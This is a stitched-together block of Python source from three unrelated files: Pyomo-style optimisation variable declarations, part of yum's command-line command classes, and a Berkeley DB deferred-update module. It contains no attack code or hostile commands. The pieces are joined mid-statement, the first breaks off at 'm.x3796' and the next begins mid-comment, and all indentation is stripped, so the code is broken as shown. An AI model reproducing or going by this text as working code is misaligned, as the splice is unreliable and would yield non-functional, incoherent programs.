m.x3679 = Var(within=Reals,bounds=(0,None),initialize=0.032749852753)
m.x3680 = Var(within=Reals,bounds=(0,None),initialize=0.092624744)
m.x3681 = Var(within=Reals,bounds=(0,None),initialize=0.013136)
m.x3682 = Var(within=Reals,bounds=(0,None),initialize=0.01794005037)
m.x3683 = Var(within=Reals,bounds=(0,None),initialize=0.010893467)
m.x3684 = Var(within=Reals,bounds=(0,None),initialize=0.031529012)
m.x3685 = Var(within=Reals,bounds=(0,None),initialize=0.11253929393)
m.x3686 = Var(within=Reals,bounds=(0,None),initialize=0.071752464935)
m.x3687 = Var(within=Reals,bounds=(0,None),initialize=0.026149)
m.x3688 = Var(within=Reals,bounds=(0,None),initialize=0.005437)
m.x3689 = Var(within=Reals,bounds=(0,None),initialize=4.65713034758874)
m.x3690 = Var(within=Reals,bounds=(0,None),initialize=0.0665275418424)
m.x3691 = Var(within=Reals,bounds=(0,None),initialize=0.001212)
m.x3692 = Var(within=Reals,bounds=(0,None),initialize=0.068609)
m.x3693 = Var(within=Reals,bounds=(0,None),initialize=0.291576)
m.x3694 = Var(within=Reals,bounds=(0,None),initialize=2.121144)
m.x3695 = Var(within=Reals,bounds=(0,None),initialize=1.1829307)
m.x3696 = Var(within=Reals,bounds=(0,None),initialize=0.02653)
m.x3697 = Var(within=Reals,bounds=(0,None),initialize=0.856571)
m.x3698 = Var(within=Reals,bounds=(0,None),initialize=0.00187207427945528)
m.x3699 = Var(within=Reals,bounds=(0,None),initialize=0.0202129527358336)
m.x3700 = Var(within=Reals,bounds=(0,None),initialize=0.0442343871470679)
m.x3701 = Var(within=Reals,bounds=(0,None),initialize=0.0574360722383835)
m.x3702 = Var(within=Reals,bounds=(0,None),initialize=0.00335943751699444)
m.x3703 = Var(within=Reals,bounds=(0,None),initialize=0.0414684649939445)
m.x3704 = Var(within=Reals,bounds=(0,None),initialize=0.00142370683016)
m.x3705 = Var(within=Reals,bounds=(0,None),initialize=0.0261048144406948)
m.x3706 = Var(within=Reals,bounds=(0,None),initialize=0.0192415620599879)
m.x3707 = Var(within=Reals,bounds=(0,None),initialize=0.0308271412717929)
m.x3708 = Var(within=Reals,bounds=(0,None),initialize=0.0544368905417636)
m.x3709 = Var(within=Reals,bounds=(0,None),initialize=0.133426281036571)
m.x3710 = Var(within=Reals,bounds=(0,None),initialize=11.8663862498047)
m.x3711 = Var(within=Reals,bounds=(0,None),initialize=12.2468430395096)
m.x3712 = Var(within=Reals,bounds=(0,None),initialize=1.18265198586128)
m.x3713 = Var(within=Reals,bounds=(0,None),initialize=1.81320274750686)
m.x3714 = Var(within=Reals,bounds=(0,None),initialize=1.17534474475467)
m.x3715 = Var(within=Reals,bounds=(0,None),initialize=3.79088717538741)
m.x3716 = Var(within=Reals,bounds=(0,None),initialize=7.4119182481687)
m.x3717 = Var(within=Reals,bounds=(0,None),initialize=0.660421718039389)
m.x3718 = Var(within=Reals,bounds=(0,None),initialize=0.214203762120338)
m.x3719 = Var(within=Reals,bounds=(0,None),initialize=4.02694371008304)
m.x3720 = Var(within=Reals,bounds=(0,None),initialize=0.775923055804487)
m.x3721 = Var(within=Reals,bounds=(0,None),initialize=0.0697626978284835)
m.x3722 = Var(within=Reals,bounds=(0,None),initialize=0.784207158779134)
m.x3723 = Var(within=Reals,bounds=(0,None),initialize=0.0925713882608052)
m.x3724 = Var(within=Reals,bounds=(0,None),initialize=0.55725348179004)
m.x3725 = Var(within=Reals,bounds=(0,None),initialize=0.632238551343254)
m.x3726 = Var(within=Reals,bounds=(0,None),initialize=0.255637722149483)
m.x3727 = Var(within=Reals,bounds=(0,None),initialize=2.07468645538596)
m.x3728 = Var(within=Reals,bounds=(0,None),initialize=0.578394481938526)
m.x3729 = Var(within=Reals,bounds=(0,None),initialize=0.110757138512429)
m.x3730 = Var(within=Reals,bounds=(0,None),initialize=0.196380776989263)
m.x3731 = Var(within=Reals,bounds=(0,None),initialize=1.33036257037804)
m.x3732 = Var(within=Reals,bounds=(0,None),initialize=0.155364326448861)
m.x3733 = Var(within=Reals,bounds=(0,None),initialize=0.0228977615372253)
m.x3734 = Var(within=Reals,bounds=(0,None),initialize=0.00610861621970931)
m.x3735 = Var(within=Reals,bounds=(0,None),initialize=0.892900168544807)
m.x3736 = Var(within=Reals,bounds=(0,None),initialize=0.217530636142636)
m.x3737 = Var(within=Reals,bounds=(0,None),initialize=0.0938119046256907)
m.x3738 = Var(within=Reals,bounds=(0,None),initialize=0.179905056538954)
m.x3739 = Var(within=Reals,bounds=(0,None),initialize=3.11552062431325)
m.x3740 = Var(within=Reals,bounds=(0,None),initialize=1.11846461956999)
m.x3741 = Var(within=Reals,bounds=(0,None),initialize=3.0510412382191)
m.x3742 = Var(within=Reals,bounds=(0,None),initialize=0.260371994459074)
m.x3743 = Var(within=Reals,bounds=(0,None),initialize=34.2638978138185)
m.x3744 = Var(within=Reals,bounds=(0,None),initialize=27.7327935181579)
m.x3745 = Var(within=Reals,bounds=(0,None),initialize=0.028131538031253)
m.x3746 = Var(within=Reals,bounds=(0,None),initialize=0.140657690156265)
m.x3747 = Var(within=Reals,bounds=(0,None),initialize=0.599295087443045)
m.x3748 = Var(within=Reals,bounds=(0,None),initialize=0.148995001548)
m.x3749 = Var(within=Reals,bounds=(0,None),initialize=7.91750738922413)
m.x3750 = Var(within=Reals,bounds=(0,None),initialize=1.18094992040429)
m.x3751 = Var(within=Reals,bounds=(0,None),initialize=0.698140175588923)
m.x3752 = Var(within=Reals,bounds=(0,None),initialize=6.60638444841137)
m.x3753 = Var(within=Reals,bounds=(0,None),initialize=6.81819651704683)
m.x3754 = Var(within=Reals,bounds=(0,None),initialize=0.658418959470949)
m.x3755 = Var(within=Reals,bounds=(0,None),initialize=1.00946608181941)
m.x3756 = Var(within=Reals,bounds=(0,None),initialize=0.654350792213349)
m.x3757 = Var(within=Reals,bounds=(0,None),initialize=2.1105042052355)
m.x3758 = Var(within=Reals,bounds=(0,None),initialize=4.12644426169796)
m.x3759 = Var(within=Reals,bounds=(0,None),initialize=0.367677208174506)
m.x3760 = Var(within=Reals,bounds=(0,None),initialize=0.286052300758072)
m.x3761 = Var(within=Reals,bounds=(0,None),initialize=2.61214851487786)
m.x3762 = Var(within=Reals,bounds=(0,None),initialize=0.655427629694048)
m.x3763 = Var(within=Reals,bounds=(0,None),initialize=0.0589290385647548)
m.x3764 = Var(within=Reals,bounds=(0,None),initialize=0.66242526939066)
m.x3765 = Var(within=Reals,bounds=(0,None),initialize=0.122162061748241)
m.x3766 = Var(within=Reals,bounds=(0,None),initialize=0.735380937142974)
m.x3767 = Var(within=Reals,bounds=(0,None),initialize=0.834335169860628)
m.x3768 = Var(within=Reals,bounds=(0,None),initialize=0.33735295305739)
m.x3769 = Var(within=Reals,bounds=(0,None),initialize=2.73786511829172)
m.x3770 = Var(within=Reals,bounds=(0,None),initialize=0.763279710339319)
m.x3771 = Var(within=Reals,bounds=(0,None),initialize=0.146160932100254)
m.x3772 = Var(within=Reals,bounds=(0,None),initialize=0.165884215215253)
m.x3773 = Var(within=Reals,bounds=(0,None),initialize=1.30227270682686)
m.x3774 = Var(within=Reals,bounds=(0,None),initialize=0.967942895643967)
m.x3775 = Var(within=Reals,bounds=(0,None),initialize=0.142656465050245)
m.x3776 = Var(within=Reals,bounds=(0,None),initialize=0.00536931864111687)
m.x3777 = Var(within=Reals,bounds=(0,None),initialize=0.54909596020259)
m.x3778 = Var(within=Reals,bounds=(0,None),initialize=1.00535165651302)
m.x3779 = Var(within=Reals,bounds=(0,None),initialize=0.433566303066558)
m.x3780 = Var(within=Reals,bounds=(0,None),initialize=0.576614213532147)
m.x3781 = Var(within=Reals,bounds=(0,None),initialize=3.03082489176049)
m.x3782 = Var(within=Reals,bounds=(0,None),initialize=1.08805904961499)
m.x3783 = Var(within=Reals,bounds=(0,None),initialize=1.24981560888688)
m.x3784 = Var(within=Reals,bounds=(0,None),initialize=0.661616925046571)
m.x3785 = Var(within=Reals,bounds=(0,None),initialize=42.3401261404924)
m.x3786 = Var(within=Reals,bounds=(0,None),initialize=14.8981191213562)
m.x3787 = Var(within=Reals,bounds=(0,None),initialize=0.150584795947117)
m.x3788 = Var(within=Reals,bounds=(0,None),initialize=0.752923979735586)
m.x3789 = Var(within=Reals,bounds=(0,None),initialize=1.5898262669498)
m.x3790 = Var(within=Reals,bounds=(0,None),initialize=0.612233805726)
m.x3791 = Var(within=Reals,bounds=(0,None),initialize=9.66185688010391)
m.x3792 = Var(within=Reals,bounds=(0,None),initialize=1.65968957951209)
m.x3793 = Var(within=Reals,bounds=(0,None),initialize=0.590523080858794)
m.x3794 = Var(within=Reals,bounds=(0,None),initialize=4.14473091043187)
m.x3795 = Var(within=Reals,bounds=(0,None),initialize=4.27761812505455)
m.x3796
"special" param like "updates"
# in returnPkgLists(). This allows us to always return "ok" for
# things like "yum list updates".
if len(extcmds) and \
rrap[0] and rop[0] and rup[0] and rep[0] and rap[0] and rip[0]:
return 1, [_('No matching Packages to list')]
return 0, []
def needTs(self, base, basecmd, extcmds):
if len(extcmds) and extcmds[0] == 'installed':
return False
return True
class ListCommand(InfoCommand):
def getNames(self):
return ['list']
def getSummary(self):
return _("List a package or groups of packages")
class EraseCommand(YumCommand):
def getNames(self):
return ['erase', 'remove']
def getUsage(self):
return "PACKAGE..."
def getSummary(self):
return _("Remove a package or packages from your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Remove Process"))
try:
return base.erasePkgs(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
def needTsRemove(self, base, basecmd, extcmds):
return True
class GroupCommand(YumCommand):
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Group Process"))
base.doRepoSetup(dosack=0)
try:
base.doGroupSetup()
except yum.Errors.GroupsError:
return 1, [_('No Groups on which to run command')]
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class GroupListCommand(GroupCommand):
def getNames(self):
return ['grouplist']
def getUsage(self):
return ""
def getSummary(self):
return _("List available package groups")
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
return base.returnGroupLists(extcmds)
def needTs(self, base, basecmd, extcmds):
return False
class GroupInstallCommand(GroupCommand):
def getNames(self):
return ['groupinstall', 'groupupdate']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Install the packages in a group on your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.installGroups(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class GroupRemoveCommand(GroupCommand):
def getNames(self):
return ['groupremove', 'grouperase']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Remove the packages in a group from your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.removeGroups(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
def needTsRemove(self, base, basecmd, extcmds):
return True
class GroupInfoCommand(GroupCommand):
def getNames(self):
return ['groupinfo']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Display details about a package group")
def doCheck(self, base, basecmd, extcmds):
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.returnGroupInfo(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class MakeCacheCommand(YumCommand):
def getNames(self):
return ['makecache']
def getUsage(self):
return ""
def getSummary(self):
return _("Generate the metadata cache")
def doCheck(self, base, basecmd, extcmds):
pass
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Making cache files for all metadata files."))
base.logger.debug(_("This may take a while depending on the speed of this computer"))
try:
for repo in base.repos.findRepos('*'):
repo.metadata_expire = 0
repo.mdpolicy = "group:all"
base.doRepoSetup(dosack=0)
base.repos.doSetup()
for repo in base.repos.listEnabled():
repo.repoXML
# These convert the downloaded data into usable data,
# we can't remove them until *LoadRepo() can do:
# 1. Download a .sqlite.bz2 and convert to .sqlite
# 2. Download a .xml.gz and convert to .xml.gz.sqlite
base.repos.populateSack(mdtype='metadata', cacheonly=1)
base.repos.populateSack(mdtype='filelists', cacheonly=1)
base.repos.populateSack(mdtype='otherdata', cacheonly=1)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
return 0, [_('Metadata Cache Created')]
def needTs(self, base, basecmd, extcmds):
return False
class CleanCommand(YumCommand):
def getNames(self):
return ['clean']
def getUsage(self):
return "[headers|packages|metadata|dbcache|plugins|expire-cache|all]"
def getSummary(self):
return _("Remove cached data")
def doCheck(self, base, basecmd, extcmds):
checkCleanArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.conf.cache = 1
return base.cleanCli(extcmds)
def needTs(self, base, basecmd, extcmds):
return False
class ProvidesCommand(YumCommand):
def getNames(self):
return ['provides', 'whatprovides']
def getUsage(self):
return "SOME_STRING"
def getSummary(self):
return _("Find what package provides the given value")
def doCheck(self, base, basecmd, extcmds):
checkItemArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.logger.debug("Searching Packages: ")
try:
return base.provides(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class CheckUpdateCommand(YumCommand):
def getNames(self):
return ['check-update']
def getUsage(self):
return "[PACKAGE...]"
def getSummary(self):
return _("Check for available package updates")
def doCommand(self, base, basecmd, extcmds):
base.extcmds.insert(0, 'updates')
result = 0
try:
ypl = base.returnPkgLists(extcmds)
if (base.conf.obsoletes or
base.verbose_logger.isEnabledFor(logginglevels.DEBUG_3)):
typl = base.returnPkgLists(['obsoletes'])
ypl.obsoletes = typl.obsoletes
ypl.obsoletesTuples = typl.obsoletesTuples
columns = _list_cmd_calc_columns(base, ypl)
if len(ypl.updates) > 0:
local_pkgs = {}
highlight = base.term.MODE['bold']
if highlight:
# Do the local/remote split we get in "yum updates"
for po in sorted(ypl.updates):
if po.repo.id != 'installed' and po.verifyLocalPkg():
local_pkgs[(po.name, po.arch)] = po
cul = base.conf.color_update_local
cur = base.conf.color_update_remote
base.listPkgs(ypl.updates, '', outputType='list',
highlight_na=local_pkgs, columns=columns,
highlight_modes={'=' : cul, 'not in' : cur})
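# "yum check-update" documents exit status 100 as "updates are
# available"; 0 means no updates, 1 means an error occurred.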
result = 100
if len(ypl.obsoletes) > 0: # This only happens in verbose mode
print _('Obsoleting Packages')
# The tuple is (newPkg, oldPkg) ... so sort by new
for obtup in sorted(ypl.obsoletesTuples,
key=operator.itemgetter(0)):
base.updatesObsoletesList(obtup, 'obsoletes',
columns=columns)
result = 100
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
else:
return result, []
class SearchCommand(YumCommand):
def getNames(self):
return ['search']
def getUsage(self):
return "SOME_STRING"
def getSummary(self):
return _("Search package details for the given string")
def doCheck(self, base, basecmd, extcmds):
checkItemArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Searching Packages: "))
try:
return base.search(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class UpgradeCommand(YumCommand):
def getNames(self):
return ['upgrade']
def getUsage(self):
return 'PACKAGE...'
def getSummary(self):
return _("Update packages taking obsoletes into account")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
def doCommand(self, base, basecmd, extcmds):
base.conf.obsoletes = 1
self.doneCommand(base, _("Setting up Upgrade Process"))
try:
return base.updatePkgs(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class LocalInstallCommand(YumCommand):
def getNames(self):
return ['localinstall', 'localupdate']
def getUsage(self):
return "FILE"
def getSummary(self):
return _("Install a local RPM")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Local Package Process"))
updateonly = basecmd == 'localupdate'
try:
return base.localInstall(filelist=extcmds, updateonly=updateonly)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class ResolveDepCommand(YumCommand):
def getNames(self):
return ['resolvedep']
def getUsage(self):
return "DEPENDENCY"
def getSummary(self):
return _("Determine which package provides the given dependency")
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Searching Packages for Dependency:"))
try:
return base.resolveDepCli(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class ShellCommand(YumCommand):
def getNames(self):
return ['shell']
def getUsage(self):
return "[FILENAME]"
def getSummary(self):
return _("Run an interactive yum shell")
def doCheck(self, base, basecmd, extcmds):
checkShellArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _('Setting up Yum Shell'))
try:
return base.doShell()
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class DepListCommand(YumCommand):
def getNames(self):
return ['deplist']
def getUsage(self):
return 'PACKAGE...'
def getSummary(self):
return _("List a package's dependencies")
def doCheck(self, base, basecmd, extcmds):
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Finding dependencies: "))
try:
return base.deplist(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class RepoListCommand(YumCommand):
def getNames(self):
return ('repolist',)
def getUsage(self):
return '[all|enabled|disabled]'
def getSummary(self):
return _('Display the configured software repositories')
def doCommand(self, base, basecmd, extcmds):
def _repo_size(repo):
ret = 0
for pkg in repo.sack.returnPackages():
ret += pkg.packagesize
return base.format_number(ret)
def _repo_match(repo, patterns):
rid = repo.id.lower()
rnm = repo.name.lower()
for pat in patterns:
if fnmatch.fnmatch(rid, pat):
return True
if fnmatch.fnmatch(rnm, pat):
return True
return False
def _num2ui_num(num):
return to_unicode(locale.format("%d", num, True))
if len(extcmds) >= 1 and extcmds[0] in ('all', 'disabled', 'enabled'):
arg = extcmds[0]
extcmds = extcmds[1:]
else:
arg = 'enabled'
extcmds = map(lambda x: x.lower(), extcmds)
verbose = base.verbose_logger.isEnabledFor(logginglevels.DEBUG_3)
if arg != 'disabled' or extcmds:
try:
# Setup so len(repo.sack) is correct
base.repos.populateSack()
base.pkgSack # Need to setup the pkgSack, so excludes work
except yum.Errors.RepoError:
if verbose:
raise
repos = base.repos.repos.values()
repos.sort()
enabled_repos = base.repos.listEnabled()
on_ehibeg = base.term.FG_COLOR['green'] + base.term.MODE['bold']
on_dhibeg = base.term.FG_COLOR['red']
on_hiend = base.term.MODE['normal']
tot_num = 0
cols = []
for repo in repos:
if len(extcmds) and not _repo_match(repo, extcmds):
continue
(ehibeg, dhibeg, hiend) = '', '', ''
ui_enabled = ''
ui_endis_wid = 0
ui_num = ""
ui_excludes_num = ''
force_show = False
if arg == 'all' or repo.id in extcmds or repo.name in extcmds:
force_show = True
(ehibeg, dhibeg, hiend) = (on_ehibeg, on_dhibeg, on_hiend)
if repo in enabled_repos:
enabled = True
if arg == 'enabled':
force_show = False
elif arg == 'disabled' and not force_show:
continue
if force_show or verbose:
ui_enabled = ehibeg + _('enabled') + hiend
ui_endis_wid = utf8_width(_('enabled'))
if not verbose:
ui_enabled += ": "
ui_endis_wid += 2
if verbose:
ui_size = _repo_size(repo)
# dbdu.py
# Copyright (c) 2019 <NAME>
# Licence: See LICENCE (BSD licence)
"""Access a Berkeley DB database with the bsddb3 module."""
import heapq
import collections
from .bytebit import Bitarray
from .constants import (
SECONDARY,
# ACCESS_METHOD,
# HASH,
SUBFILE_DELIMITER,
SEGMENT_HEADER_LENGTH,
)
from .segmentsize import SegmentSize
from .recordset import (
RecordsetSegmentBitarray,
RecordsetSegmentInt,
RecordsetSegmentList,
)
from . import _databasedu
class DatabaseError(Exception):
"""Exception for Database class."""
class Database(_databasedu.Database):
"""Customise _db.Database for deferred update.
The class which chooses the interface to Berkeley DB must include this
class earlier in the Method Resolution Order than _db.Database.
Normally deferred updates are synchronised with adding the last record
number to a segment. Sometimes memory constraints will force deferred
updates to be done more frequently, but this will likely increase the time
taken to do the deferred updates for the second and later points in a
segment.
"""
def __init__(self, *a, **kw):
"""Extend and initialize deferred update data structures."""
super().__init__(*a, **kw)
self.deferred_update_points = None
self.first_chunk = {}
self.high_segment = {}
self.initial_high_segment = {}
self.existence_bit_maps = {}
self.value_segments = {} # was values in secondarydu.Secondary
self._int_to_bytes = None
def database_cursor(self, file, field, keyrange=None):
"""Not implemented for deferred update."""
raise DatabaseError("database_cursor not implemented")
# Deferred updates are non-transactional in Berkeley DB.
def environment_flags(self, dbe):
"""Return environment flags for deferred update."""
return (
dbe.DB_CREATE
|
# dbe.DB_RECOVER |
dbe.DB_INIT_MPOOL
| dbe.DB_INIT_LOCK
|
# dbe.DB_INIT_LOG |
# dbe.DB_INIT_TXN |
dbe.DB_PRIVATE
)
def checkpoint_before_close_dbenv(self):
"""Do nothing. Deferred updates are non-transactional."""
# Most calls of txn_checkpoint() are conditional on self.dbtxn, but the
# call when closing the database does not check for a transaction.
# Rely on environment_flags() call for transaction state.
def start_transaction(self):
"""Do not start transaction in deferred update mode."""
self.dbtxn = None
def do_final_segment_deferred_updates(self):
"""Do deferred updates for partially filled final segment."""
# Write the final deferred segment database for each index
for file in self.existence_bit_maps:
dbc = self.table[file][0].cursor(txn=self.dbtxn)
try:
segment, record_number = divmod(
dbc.last()[0], SegmentSize.db_segment_size
)
if record_number in self.deferred_update_points:
continue # Assume put_instance did deferred updates
except TypeError:
continue
finally:
dbc.close()
self.write_existence_bit_map(file, segment)
for secondary in self.specification[file][SECONDARY]:
self.sort_and_write(file, secondary, segment)
self.merge(file, secondary)
def set_defer_update(self):
"""Prepare to do deferred update run."""
self._int_to_bytes = [
n.to_bytes(2, byteorder="big")
for n in range(SegmentSize.db_segment_size)
]
self.start_transaction()
for file in self.specification:
dbc = self.table[file][0].cursor()
try:
high_record = dbc.last()
finally:
dbc.close()
if high_record is None:
self.initial_high_segment[file] = None
self.high_segment[file] = None
self.first_chunk[file] = None
continue
segment, record = divmod(
high_record[0], SegmentSize.db_segment_size
)
self.initial_high_segment[file] = segment
self.high_segment[file] = segment
self.first_chunk[file] = record < min(self.deferred_update_points)
def unset_defer_update(self):
"""Unset deferred update for db DBs. Default all."""
self._int_to_bytes = None
for file in self.specification:
self.high_segment[file] = None
self.first_chunk[file] = None
self.commit()
def write_existence_bit_map(self, file, segment):
"""Write the existence bit map for segment."""
self.ebm_control[file].ebm_table.put(
segment + 1, self.existence_bit_maps[file][segment].tobytes()
)
def _sort_and_write_high_or_chunk(
self, file, field, segment, cursor_new, segvalues
):
# Note cursor_high binds to database (table_connection_list[0]) only if
# it is the only table.
# if self.specification[file][FIELDS].get(ACCESS_METHOD) == HASH:
# segkeys = tuple(segvalues)
# else:
# segkeys = sorted(segvalues)
# Follow example set in merge().
# To verify path coverage uncomment the '_path_marker' code.
# self._path_marker = set()
segkeys = sorted(segvalues)
cursor_high = self.table[SUBFILE_DELIMITER.join((file, field))][
-1
].cursor(txn=self.dbtxn)
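# Layout of an index entry value, as read and written below (derived
# from this method; SEGMENT_HEADER_LENGTH == 6 is an assumption):
#   segref[0:4]   segment number, big-endian
#   segref[4:6]   count of records in the segment, big-endian
#   segref[6:10]  record number of the list or bitmap in segment_table
# When the count is 1 the entry is only 6 bytes and segref[4:6] holds
# the record number itself instead of a reference.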
try:
for skey in segkeys:
k = skey.encode()
# Get high existing segment for value.
if not cursor_high.set(k):
# No segments for this index value.
# self._path_marker.add('p1')
continue
if not cursor_high.next_nodup():
segref = cursor_high.last()[1]
# self._path_marker.add('p2a')
else:
# self._path_marker.add('p2b')
segref = cursor_high.prev()[1]
if segment != int.from_bytes(segref[:4], byteorder="big"):
# No records exist in high segment for this index
# value.
# self._path_marker.add('p3')
continue
current_segment = self.populate_segment(segref, file)
seg = (
self.make_segment(k, segment, *segvalues[skey])
| current_segment
).normalize()
# Avoid 'RecordsetSegment<*>.count_records()' methods because
# the Bitarray version is too slow, and the counts are derived
# from sources available here.
# Safe to add the counts because the new segment will not use
# record numbers already present on current segment.
if isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p4a')
current_count = 1
else:
# self._path_marker.add('p4b')
current_count = int.from_bytes(
segref[4:SEGMENT_HEADER_LENGTH], "big"
)
new_count = segvalues[skey][0] + current_count
if isinstance(seg, RecordsetSegmentBitarray):
# self._path_marker.add('p5a')
if isinstance(current_segment, RecordsetSegmentList):
# self._path_marker.add('p5a-a')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
elif isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p5a-b')
srn = self.segment_table[file].append(seg.tobytes())
cursor_new.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5a-c')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
elif isinstance(seg, RecordsetSegmentList):
# self._path_marker.add('p5b')
if isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p5b-a')
srn = self.segment_table[file].append(seg.tobytes())
cursor_new.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5b-b')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5c')
raise DatabaseError("Unexpected segment type")
# Delete segment so it is not processed again as a new
# segment.
del segvalues[skey]
finally:
# self._path_marker.add('p6')
cursor_high.close()
del cursor_high
del segkeys
def sort_and_write(self, file, field, segment):
"""Sort the segment deferred updates before writing to database."""
# Anything to do?
if field not in self.value_segments[file]:
return
# Lookup table is much quicker, and noticeable, in bulk use.
int_to_bytes = self._int_to_bytes
segvalues = self.value_segments[file][field]
# Prepare to wrap the record numbers in an appropriate Segment class.
for k in segvalues:
value = segvalues[k]
if isinstance(value, list):
segvalues[k] = [
len(value),
b"".join([int_to_bytes[n] for n in value]),
]
elif isinstance(value, Bitarray):
segvalues[k] = [
value.count(),
value.tobytes(),
]
elif isinstance(value, int):
segvalues[k] = [1, value]
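# Worked example of the packing above (added for illustration): with
# the 2-byte big-endian lookup table from set_defer_update(), a list of
# record offsets [3, 7] becomes [2, b'\x00\x03\x00\x07'], a Bitarray
# becomes [population_count, bitmap_bytes], and a bare int n stays as
# [1, n] so the count-1 case below can store it inline.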
# New records go into temporary databases, one for each segment, except
# when filling the segment which was high when this update started.
if (
self.first_chunk[file]
and self.initial_high_segment[file] != segment
):
self.new_deferred_root(file, field)
# The low segment in the import may have to be merged with an existing
# high segment on the database, or the current segment in the import
# may be done in chunks of less than a complete segment. (The code
# which handles this is in self._sort_and_write_high_or_chunk because
# the indentation seems too far right for easy reading: there is an
# extra 'try ... finally ...' compared with the _sqlitedu module which
# makes the difference.)
# Note the substantive difference between this module and _sqlitedu:
# the code for Berkeley DB updates the main index directly if an entry
# already exists, but the code for SQLite always updates a temporary
# table and merges into the main table later.
cursor_new = self.table[SUBFILE_DELIMITER.join((file, field))][
-1
].cursor(txn=self.dbtxn)
try:
if (
self.high_segment[file] == segment
or not self.first_chunk[file]
):
self._sort_and_write_high_or_chunk(
file, field, segment, cursor_new, segvalues
)
# Add the new segments in segvalues
segment_bytes = segment.to_bytes(4, byteorder="big")
# if self.specification[file][FIELDS].get(ACCESS_METHOD) == HASH:
# segkeys = tuple(segvalues)
# else:
# segkeys = sorted(segvalues)
segkeys = sorted(segvalues)
for skey in segkeys:
count, records = segvalues[skey]
del segvalues[skey]
k = skey.encode()
if count > 1:
srn = self.segment_table[file].append(records)
cursor_new.put(
k,
b"".join(
(
segment_bytes,
count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
cursor_new.put(
k,
b"".join(
(
segment_bytes,
records.to_bytes(2, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
finally:
cursor_new.close()
# self.table_connection_list[-1].close() # multi-chunk segments
# Flush buffers to avoid 'missing record' exception in populate_segment
# calls in later multi-chunk updates on same segment. Not known to be
# needed generally yet.
self.segment_table[file].sync()
def new_deferred_root(self, file, field):
"""Make new DB in dbenv for deferred updates and close current one."""
tablename = SUBFILE_DELIMITER.join((file, field))
self.table[tablename].append(self._dbe.DB(self.dbenv))
if len(self.table[tablename]) > 2:
try:
self.table[tablename][-2].close()
except:
pass
try:
